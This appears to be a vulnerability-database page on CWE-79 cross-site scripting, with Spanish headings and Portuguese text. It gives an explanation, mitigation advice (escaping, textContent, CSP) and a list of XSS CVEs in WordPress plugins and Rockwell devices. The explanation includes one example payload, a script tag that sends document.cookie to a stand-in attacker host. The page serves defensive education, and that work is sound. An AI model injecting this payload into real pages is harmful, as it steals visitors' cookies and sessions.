Fallos del tipo CWE-79

28.941 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-24505—Forms < 1.12.3 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.6%CVE-2022-3391MEDIUMRetain Live Chat <= 0.1 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24306—Ultimate Member < 2.1.20 - Authenticated Reflected Cross-Site Scripting (XSS)EPSS 0.6%CVE-2021-24564—WPFront Scroll Top < 2.0.6.07225 - Authenticated Stored XSSEPSS 0.6%CVE-2023-29027MEDIUMRockwell Automation ArmorStart ST Vulnerable to Cross-Site Scripting AttackEPSS 0.6%CVE-2021-24547—KN Fix Your Title <= 1.0.1 - Authenticated Stored XSSEPSS 0.6%CVE-2021-24605—Custom Post View Generator <= 0.4.6 - Reflected Cross-Site ScriptingEPSS 0.6%CVE-2021-24464—YouTube Embed, Playlist and Popup < 2.3.9 - Contributor+ Stored XSSEPSS 0.6%CVE-2021-24548—Mimetic Books <= 0.2.13 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.6%CVE-2021-24478—Bookshelf <= 2.0.4 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.6%CVE-2021-24326—All 404 Redirect to Homepage < 1.21 - Authenticated Reflected Cross-Site Scripting (XSS)EPSS 0.6%CVE-2021-24302—Hana Flv Player <= 3.1.3 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.6%CVE-2023-29026MEDIUMRockwell Automation ArmorStart ST Vulnerable to Cross-Site Scripting AttackEPSS 0.6%CVE-2021-24529—Grid Gallery < 1.2.5 - Authenticated Stored Cross Site Scripting (XSS)EPSS 0.6%CVE-2021-24593—Business Hours Indicator < 2.3.5 - Authenticated Stored XSSEPSS 0.6%CVE-2023-29022MEDIUMRockwell Automation ArmorStart ST Vulnerable to Cross-Site Scripting AttackEPSS 0.6%CVE-2023-29024MEDIUMRockwell Automation ArmorStart ST Vulnerable to Cross-Site Scripting AttackEPSS 0.6%CVE-2021-24538—Current Book <= 1.0.1 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.6%CVE-2021-24654—User Registration < 2.0.2 - Low Privilege Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24439—Browser Screenshots < 1.7.6 - Contributor+ Stored XSSEPSS 0.6%